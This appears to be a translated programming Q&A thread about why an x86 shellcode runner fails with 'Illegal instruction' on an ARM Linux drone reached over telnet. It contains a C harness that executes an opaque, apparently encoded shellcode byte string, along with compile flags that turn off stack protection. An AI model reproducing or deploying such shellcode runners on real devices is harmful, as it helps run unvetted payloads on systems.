【发布时间】:2018-07-11 22:52:33
【问题描述】:
我正在做一个项目,我需要在 32 位 arm 处理器上运行 linux 的无人机上执行一些 shellcode。我可以使用标准的busybox shell通过telnet与无人机通信,因此我无法执行许多复杂的命令,因此无需在无人机本身上进行编译。我能够传输和执行一个我用“arm-linux-gnueabi-gcc”交叉编译的 helloworld 程序。现在问题来了:当我尝试用我的 x86 shellcode c 程序做同样的事情时,在无人机上运行它后,我得到了错误Illegal instruction。
我的 c 程序如下所示:
#include <string.h>
#include <stdio.h>
unsigned char code[] =
"\xbe\xc6\xfe\xae\xa9\xd9\xea\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x1f\x83\xc3\x04\x31\x73\x11\x03\x73\x11\xe2\x33\x94\xa4\xf7"
"\x8a\xb2\x4e\xe4\xbf\x07\xe2\x81\x3d\x38\x62\xdf\xa0\xf5\xeb"
"\x48\x79\x6e\x2c\xde\xbd\x5d\xc4\x1d\x3d\xb3\x48\xab\xdc\xd9"
"\x16\xf3\x4e\x4f\x80\x8a\x8f\x2c\xe3\x0d\xca\x73\x82\x14\x9a"
"\x07\x48\x4f\x80\xe8\xb2\x8f\x9c\x82\xb2\xe5\x19\xda\x50\xc8"
"\xe8\x11\x16\xae\x2a\xd0\xaa\x5a\x8d\x91\xd2\x25\xd1\xc5\xdc"
"\x55\x58\x06\x1d\xbe\x56\x08\x7d\x4d\xd6\xf7\x4f\xce\x93\xc8"
"\x28\xdf\xc0\x41\x29\x46\x40\x5d\x1a\x7a\x61\xde\xdf\xbd\x01"
"\xdd\x20\xdc\x49\xe0\xde\x1f\xa9\x58\xdf\x1f\xa9\x9e\x2d\x9f";
int main(int argc, char **argv) {
int foo_value = 0;
int (*foo)() = (int(*)())code;
foo_value = foo();
printf("%d\n", foo_value);
}
我已使用以下命令编译此代码:arm-linux-gnueabi-gcc -fno-stack-protector -z execstack cprogram.c -o output.elf。 “文件”命令输出:
output.elf: ELF 32-bit LSB pie executable ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.3, for GNU/Linux 3.2.0, BuildID[sha1]=43757152cbcf40dcc6a75cf210c156332557b575, not stripped
这对我来说看起来很正常。当编译为 32 位可执行文件时,这个完全相同的代码在我的 64 位 linux 机器上运行良好。我已经从 shellcode 中删除了 x00 指令,我不确定是否还有更多的坏字符需要删除。所以我的问题是:是什么导致了这个错误,什么是能够在 arm 处理器上正确执行这个代码的方法。谢谢!
【问题讨论】:
-
code看起来是 CPU 指令,但为什么你认为这些在 ARM CPU 上工作的指令仍然可以在 X86 CPU 上工作? -
实际上是相反的,我的代码在 x86 cpu 上运行,而我正在尝试在 arm cpu 上执行。我现在意识到这行不通。有没有办法将这些指令转换为在 ARM cpu 上工作?
-
我知道 [qemu] (qemu.org) 是一个“通用和开源机器模拟器和虚拟器”,但不确定它是否符合您的期望。另外我怀疑这是否值得,因为指令代码很小,为什么不拆开它们,也许(只是也许)逆向工程为其他 CPU 重新实现它?
-
我自己的逆向工程经验还不够,但我最终找到了一些 ARM shellcode 来做我想做的事情。无论如何,谢谢!
标签: c compilation arm elf shellcode